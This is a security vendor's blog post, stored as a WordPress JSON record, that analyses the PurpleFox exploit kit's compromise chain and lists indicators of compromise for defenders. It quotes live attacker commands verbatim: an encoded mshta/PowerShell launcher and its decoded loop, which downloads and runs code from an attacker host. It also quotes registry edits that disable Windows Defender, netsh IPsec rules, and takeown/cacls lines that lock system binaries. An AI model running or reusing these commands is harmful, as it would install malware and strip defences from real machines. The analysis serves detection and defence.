{"id":1765,"date":"2021-02-02T20:18:53","date_gmt":"2021-02-02T18:18:53","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=1765"},"modified":"2026-06-08T22:41:40","modified_gmt":"2026-06-08T22:41:40","slug":"purplefox-compromise-chain-analysis","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/purplefox-compromise-chain-analysis\/","title":{"rendered":"PurpleFox: analysis of the compromise chain"},"content":{"rendered":"<p><!--StartFragment--><\/p>\n\n\n<p style=\"text-align: justify\">In January 2021, we detected and managed security alerts related to workstation compromise attempts executed through the <strong>PurpleFox Exploit Kit<\/strong>.<\/p>\n<p style=\"text-align: justify\">The following image represents the compromise schema we observed during our analysis:<\/p>\n\n\n\n<figure class=\"wp-block-image alignwide is-style-zoooom\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/PurpleFox-flow-1024x269.png\" alt=\"\" class=\"wp-image-1785\" loading=\"lazy\" \/><\/figure>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\">Exploit Kit &amp; Purple Fox<\/h2>\n\n\n\n<p style=\"text-align: justify\"><span>An <strong>Exploit Kit<\/strong><span> is a toolkit of offensive instruments used by threat actors to compromise workstations during Internet browsing. The kit typically exploits vulnerabilities in <strong>browsers<\/strong> and software such as <strong>Adobe Flash<\/strong>, <strong>Java<\/strong>, and <strong>Microsoft Silverlight<\/strong>.<\/span><\/p>\n<p style=\"text-align: justify\"><strong>PurpleFox<\/strong> is an exploit kit designed to execute PowerShell code for downloading rootkit malware. First identified in 2018, the following is a list of technical articles addressing this threat:<\/p>\n<ul>\n<li><a href=\"https:\/\/blog.360totalsecurity.com\/en\/purple-fox-trojan-burst-out-globally-and-infected-more-than-30000-users\/\">Purple Fox Trojan burst out globally and infected more than 30,000 users | 360 Total Security Blog<\/a><\/li>\n<li><a href=\"https:\/\/www.trendmicro.com\/en_ca\/research\/19\/i\/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html\">&#8216;Purple Fox&#8217; Malware Can Rootkit and Abuse PowerShell (trendmicro.com)<\/a><\/li>\n<li><a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal\">Purple Fox EK Adds Exploits for CVE-2020-0674 and CVE-2019-1458 to its Arsenal | Proofpoint US<\/a><\/li>\n<li><a href=\"https:\/\/labs.sentinelone.com\/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow\/\">Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow &#8211; SentinelLabs (sentinelone.com)<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\">The Compromise Chain<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. Compromise Initiation<\/h3>\n\n\n\n<p style=\"text-align: justify\">As observed in previous analyses, the attack originates during navigation to the web page hxxp:\/\/speedjudgmentacceleration[.]com .<\/p>\n<p style=\"text-align: justify\">By exploiting an <em>Adobe Flash<\/em> vulnerability, the workstation compromise chain is initiated via the command:<\/p>\n<p style=\"text-align: left\"><code>mshta vbscript:createobject(\"wscript.shell\").run(\"PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADsAJABpACsAKwApAA0ACgB7AA0ACgBpAGUAeAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwB5AG8AdQAvAHUAcAAuAHAAaABwAD8AawBlAHkAPQAxACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA4ADAADQAKAH0ADQAKAA==\",0)(window.close)<\/code><\/p>\n<p>Base64 decoding yields:<\/p>\n<p style=\"text-align: left\"><code><span>for($i=1;$i -le 10;$i++) { iex(new-object net.webclient).downloadstring(\"http:\/\/rawcdn.githack.cyou\/up.php?key=1\") Start-Sleep 180 }<\/span><\/code><\/p>\n<p style=\"text-align: justify\">This command executes a download (10 attempts) and launches additional malicious code hosted at hxxp:\/\/rawcdn[.]githack[.]cyou\/up[.]php?key=1 containing further instructions for the final payload.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2. System Modifications and Controls<\/h3>\n\n\n\n<p style=\"text-align: justify\">The script begins by defining a new type within which the <strong>MsiInstallProduct<\/strong> and <strong>MsiSetInternalUI<\/strong> functions from the <strong>msi.dll<\/strong> library are imported, necessary for malware installation and suppression of the installation pop-up.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img1-300x106.png\" alt=\"\" class=\"wp-image-1775\" width=\"586\" height=\"207\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align: justify\">Subsequently, the script defines a command block that will be converted to a string and base64-encoded. The command set is used to download and install, via <strong>MsiInstallProduct<\/strong>, one of two resources present in <strong>$msipathALL<\/strong>. The entire operation is placed in a loop that terminates only when the registry value <code>HKCU:\\Software\\7-Zip\\StayOnTop<\/code> is found.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img2-300x65.png\" alt=\"\" class=\"wp-image-1776\" width=\"656\" height=\"142\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img3-300x8.png\" alt=\"\" class=\"wp-image-1777\" width=\"978\" height=\"26\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img4-300x8.png\" alt=\"\" class=\"wp-image-1778\" width=\"954\" height=\"25\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align: justify\">Both resources, despite presenting different file extensions, are identical <strong>MSI<\/strong> files (same hash). This is the final <em>payload<\/em> for endpoint compromise:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code><strong>SHA-256<\/strong><\/code> <code>d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3. Administrative privilege verification<\/h3>\n\n\n\n<p style=\"text-align: justify\"><span>Before executing the encoded command through a new PowerShell call, the malware verifies possession of administrative privileges:<\/span><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img6-300x31.png\" alt=\"\" class=\"wp-image-1780\" width=\"668\" height=\"69\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align: justify\">Upon failure, based on system architecture, scripts containing exploits are downloaded and executed to perform <em><strong>local privilege escalation<\/strong><\/em> activities (T1548.004).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code><strong>x32<\/strong><\/code> <code>hxxp:\/\/rawcdn[.]githack[.]cyou\/up[.]php?key=3<\/code><br><strong><code>x64<\/code><\/strong> <code>hxxp:\/\/rawcdn[.]githack[.]cyou\/up[.]php?key=4<\/code><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img5-300x23.png\" alt=\"\" class=\"wp-image-1779\" width=\"666\" height=\"51\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/02\/purplefox_img7-300x127.png\" alt=\"\" class=\"wp-image-1781\" width=\"670\" height=\"283\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">4. The role of the MSI file<\/h3>\n\n\n<p><!--EndFragment--><\/p>\n\n\n<p>The rootkit is downloaded from the URLs:<\/p>\n<ul>\n<li><code>hxxp:\/\/rawcdn[.]githack[.]cyou\/up.php?key=2<\/code><\/li>\n<li><code>hxxp:\/\/rawcdn[.]githack[.]com\/x7hGFE28oiG8kDre\/BGuoFr0ACb9E0frq\/afb90fd8276b3530cf1e526e60f8e1d61077e2a5\/M001.jpg<\/code><\/li>\n<\/ul>\n<p style=\"text-align: justify\">As previously highlighted, both files are the same <strong>dropper<\/strong> in the form of an <strong>MSI<\/strong> <em>installer<\/em> that, during the installation process, creates the following files on the system:<\/p>\n<ul>\n<li>a file with <strong>.ini<\/strong> extension<\/li>\n<li>a file with <strong>.log<\/strong> or <strong>.xml<\/strong> extension (based on system architecture)<\/li>\n<\/ul>\n<p style=\"text-align: justify\">The MSI <em>malware<\/em>, after saving the two files, performs several modifications to the system registry:<\/p>\n<ul>\n<li>creates the value <code>HKCU:\\Software\\7-Zip\\StayOnTop<\/code> which will be used as a control to verify successful installation<\/li>\n<li>disables Windows Defender by creating the values<br><code>HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware<br>HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware<\/code><\/li>\n<li>sets operations to execute upon system restart:<br><code>HKLM\\System\\CurrentControlSet\\Control\\SessionManager\\PendingFileRenameOperations<\/code><br><code>\\??\\C:\\Windows\\AppPatch\\Acpsens.dll, ,<\/code><br><code>\\??\\C:\\Windows\\system32\\sens.dll, \\??\\C:\\Windows\\AppPatch\\Acpsens.dll,<\/code><br><code>\\??\\C:\\Windows\\system32\\sens.dll, ,<\/code><br><code>\\??\\C:\\Windows\\.xml, \\??\\C:\\Windows\\system32\\sens.dll,<\/code><br><code>\\??\\C:\\Windows\\AppPatch\\Ke583427.xsl, ,<\/code><br><code>\\??\\C:\\Windows\\.ini, \\??\\C:\\Windows\\AppPatch\\Ke583427.xsl<\/code><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">5. System modifications<\/h3>\n\n\n\n<p style=\"text-align: justify\">Finally, the malware applies modifications to the system firewall (TCP and UDP ports) and alters permissions on <strong>jscript.dll<\/strong> and <strong>cscript.exe<\/strong>. Detection of such registry and file system alterations through <a href=\"https:\/\/fortgale.com\/en\/managed-detection-and-response\/\">Managed Detection and Response<\/a> capabilities enables rapid identification of post-exploitation persistence mechanisms (T1547.001, T1112).<\/p>\n\n\n\n<figure class=\"wp-block-table alignfull\"><table class=\"\"><tbody><tr><td class=\"has-text-align-center\" data-align=\"center\"> <code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filterlist name=Filter1<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1<\/code><br><code>\"C:\\Windows\\SysWOW64\\netsh.exe\" ipsec static set policy name=qianye assign=y<\/code> <br> <code>\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\system32\\jscript.dll<\/code><br><code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\system32\\jscript.dll \/E \/P everyone:N<\/code><br><code>\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\syswow64\\jscript.dll<\/code><br><code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\syswow64\\jscript.dll \/E \/P everyone:N<\/code><br><code>\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\system32\\cscript.exe<\/code><br><code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\system32\\cscript.exe \/E \/P everyone:N<\/code><br><code>\"C:\\Windows\\SysWOW64\\takeown.exe\" \/f C:\\Windows\\syswow64\\cscript.exe<\/code><br><code>\"C:\\Windows\\SysWOW64\\cacls.exe\" C:\\Windows\\syswow64\\cscript.exe \/E \/P everyone:N<\/code> <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p style=\"text-align: justify\">The malware concludes its activities by executing the command:&nbsp;<\/p>\n\n\n\n<p class=\"has-text-align-center wp-block-paragraph\"> <code>\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Sleep -Seconds 900; Restart-Computer -Force<\/code> <\/p>\n\n\n\n<p>which consists of a system restart after 15 minutes, forcing execution of the <strong>sens.dll<\/strong> library upon reboot.<\/p>\n<p style=\"text-align: justify\">This library proves central to persistence and control of the compromised system. By exploiting service creation, the malware is launched with the creation of an <strong>svchost<\/strong> process and subsequent injection of the <strong>shellcode<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Indicators of Compromise<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">SHA-256<\/h3>\n\n\n\n<ul>\n<li style=\"text-align: left\">\n<p><code>d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc<\/code> <strong>MSI installer<\/strong><\/p>\n<\/li>\n<li>\n<p class=\"\"><code>9845e02032d02130bde3ffe2a16ec9706893aa9c8db5712beed6f129a74ffb35<\/code>&nbsp;<strong>sens.dll (x64)<\/strong> &#8211; <a href=\"https:\/\/www.virustotal.com\/gui\/file\/9845e02032d02130bde3ffe2a16ec9706893aa9c8db5712beed6f129a74ffb35\/detection\">VirusTotal<\/a><\/p>\n<\/li>\n<li>\n<p class=\"lang:default decode:true  \"><code>bcefd583e2562fbf38b28118eda0957ac96c3945d12868eaa9bc06f93da5e4db<\/code>&nbsp; <strong>sens.dll (x32)<\/strong> &#8211;&nbsp;<a href=\"https:\/\/www.virustotal.com\/gui\/file\/bcefd583e2562fbf38b28118eda0957ac96c3945d12868eaa9bc06f93da5e4db\/detection\">VirusTotal<\/a><\/p>\n<p><\/p>\n<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Domains<\/h3>\n\n\n\n<ul>\n<li><code>speedjudgmentacceleration[.]com<\/code><\/li>\n<li><code>rawcdn[.]githack[.]cyou<\/code><\/li>\n<li><code>rawcdn[.]githack[.]com<\/code><\/li>\n<\/ul>\n\n\n<p>Defensive teams should prioritize detection of IPsec filter manipulation (T1562.004 \u2014 Impair Defenses: Disable or Modify System Firewall) combined with DLL injection patterns targeting system libraries, as this combination indicates post-exploitation persistence activity.<\/p>","protected":false},"excerpt":{"rendered":"<p>PurpleFox malware framework: rootkit components, MSI installer abuse, exploit-driven worm capabilities and lateral movement patterns observed in Italian intrusions.<\/p>\n","protected":false},"author":1,"featured_media":1829,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[140,201,212,235,3181,272,279,301,433],"class_list":["post-1765","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-exploitkit","tag-lateral-movement","tag-malware","tag-mshta","tag-msi-abuse","tag-powershell","tag-purplefox","tag-rootkit","tag-worm"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1765","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=1765"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1765\/revisions"}],"predecessor-version":[{"id":9861,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1765\/revisions\/9861"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=1765"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=1765"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=1765"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}